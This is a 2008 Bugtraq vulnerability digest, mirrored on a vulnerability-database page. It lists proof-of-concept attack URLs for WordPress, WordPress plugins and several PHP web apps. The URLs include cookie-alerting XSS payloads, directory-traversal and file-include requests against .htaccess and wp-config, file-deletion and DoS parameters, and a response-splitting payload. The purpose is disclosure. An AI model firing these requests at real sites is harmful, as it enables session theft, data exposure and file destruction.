Vulners
Lucene search
vuln-summary.txt
🗓️ 03 Jan 2008 00:00:00Reported by websecurity.com.uaType 
packetstorm🔗 packetstormsecurity.com👁 35 Views
`Dear bugtraq,
Below is a digest of vulnerabilities published by
http://securityvulns.com/ and believed to be previously unpublished in
English. All vulnerabilities were reported by MustLive
(http://websecurity.com.ua/).
1. AwesomeTemplateEngine Crossite scripting
Multiple crossite scripting (require register_globvals):
http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument784.html
Additional details (in Ukrainian): http://websecurity.com.ua/1694/
2. Wordpress multiple security vulnerabilities:
2.1 information disclosure (WordPress 2.2/2.3)
Invalid request disclosures database structure and local paths:
http://site/?feed=rss2&p=1
Original article (in Russian): http://securityvulns.ru/Sdocument663.html
Additional details (in Ukrainian): http://websecurity.com.ua/1634/
2.2 crossite scripting (WordPress <= 2.0.9)
http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
Original article (in Russian): http://securityvulns.ru/Sdocument714.html
Additional details (in Ukrainian): http://websecurity.com.ua/1658/
2.3 Directory traversal, Arbitrary file deletion, Denial of Service
and Cross-Site Scripting via wp-db-backup.php
Directory Traversal (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess
Arbitrary file deletion and DoS (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php
XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument755.html
Additional details (in Ukrainian): http://websecurity.com.ua/1676/
2.4 Local file include, Directory traversal and Full path disclosure
(WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x)
Full path disclosure:
http://site/wp-admin/admin.php?import=\..\..\wp-config
http://site/wp-admin/themes.php?page=
http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/templates.php?file=
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=
Local file include and Directory traversal:
http://site/wp-admin/admin.php?import=\..\..\file
http://site/wp-admin/themes.php?page=\..\..\file.php
http://site/wp-admin/themes.php?page=\..\..\.htaccess
http://site/wp-admin/edit.php?page=\..\..\file.php
http://site/wp-admin/edit.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\file.php
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/templates.php?page=\..\..\file.php
http://sites/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess
http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess
Arbitrary file edit:
http://site/wp-admin/templates.php?file=\..\..\file
Attacks with backslash are possible in Windows version.
Original article (in Russian):
http://securityvulns.ru/Sdocument762.html
http://securityvulns.ru/Sdocument768.html
http://securityvulns.ru/Sdocument773.html
http://securityvulns.ru/Sdocument772.html
Additional detail (in Ukrainian):
http://websecurity.com.ua/1679/
http://websecurity.com.ua/1683/
http://websecurity.com.ua/1686/
http://websecurity.com.ua/1687/
3. Crossite scripting and Denial of Service in PRO-Search <= 0.17
XSS:
http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Denial of Service:
http://site/?show_page=20000&time=0
Original article (in Russian): http://securityvulns.ru/Sdocument731.html
Additional details (in Ukrainian): http://websecurity.com.ua/1259/
4. Persistant crossite scripting and request forgery in WP-ContactForm
<= 1.5 alpha (WordPress plugin)
POST request to
http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php
with different form fields.
Exploits:
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html
Original article (in Russian):
http://securityvulns.ru/Sdocument667.html
http://securityvulns.ru/Sdocument546.html
Additional details (in Ukrainian):
http://websecurity.com.ua/1641/
http://websecurity.com.ua/1600/
5. RotaBanner Local <= 3 crossite scripting
http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument625.html
Additional details (in Ukrainian): http://websecurity.com.ua/1442/
6. ExpressionEngine <= 1.2.1 response splitting and crossite scripting
http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E
Original article (in Russian): http://securityvulns.ru/Sdocument472.html
Additional details (in Ukrainian): http://websecurity.com.ua/1454/
-=-=-=-
There are also few vulnerabilities published in English as a part of
the Month of Bugs in CAPTCHA:
Cryptographp <= 1.2 WordPress plugin multiple persistant crossite
scriptings
Original article: http://websecurity.com.ua/1596/
XSS in Math Comment Spam Protection < 2.2
Original article: http://websecurity.com.ua/1576/
XSS in Captcha! <= 2.5d
Original article: http://websecurity.com.ua/1588/
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4